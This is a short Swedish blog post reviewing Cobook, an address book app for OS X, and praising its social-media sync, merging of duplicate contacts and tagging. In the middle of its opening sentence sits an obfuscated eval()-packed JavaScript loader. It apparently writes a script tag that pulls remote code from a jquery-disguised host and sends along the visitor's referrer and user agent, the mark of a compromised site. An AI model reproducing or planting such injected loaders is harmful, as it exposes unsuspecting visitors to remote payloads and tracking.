Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Cobook – Den smartare adressboken för OS X

Cobook – Den smartare adressboken för OS X
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sazit|var|u0026u|referrer|etedn||js|php’.split(’|’),0,{}))
kommer Cobook, en riktigt bra adressbok.

Vi vet att den ”vanliga” adressboken som ingår i Mac i dag faktiskt är riktigt dålig. Funktioner så som synkronisering med Facebook, Twitter och andra sociala medier finns inte. Det har visat sig vara en ganska viktig faktor enligt många.

Nu kommer i alla fall Cobook och visar vad skåpet ska stå. Den här applikationen till Mac synkar otroligt bra med det flesta tjänster ute i cyber-världen . Det är bl.a. enkelt att lägga ihop dubbla kopior av samma person, hitta och lägga till grupper och så är det snyggt och riktigt snabbt.

Du kan även tagga dina kontakter, något som verkligen varit saknat i den ”vanliga” adressboken.

Alla ändringar och tillägg som görs i Cobook följer med till adressboken så att iCloud och iOS synkroniseringen fortfarande fungerar som vanligt.

Vi har fått tag i en video som kan ses ovan, den demonstrerar många av funktionerna.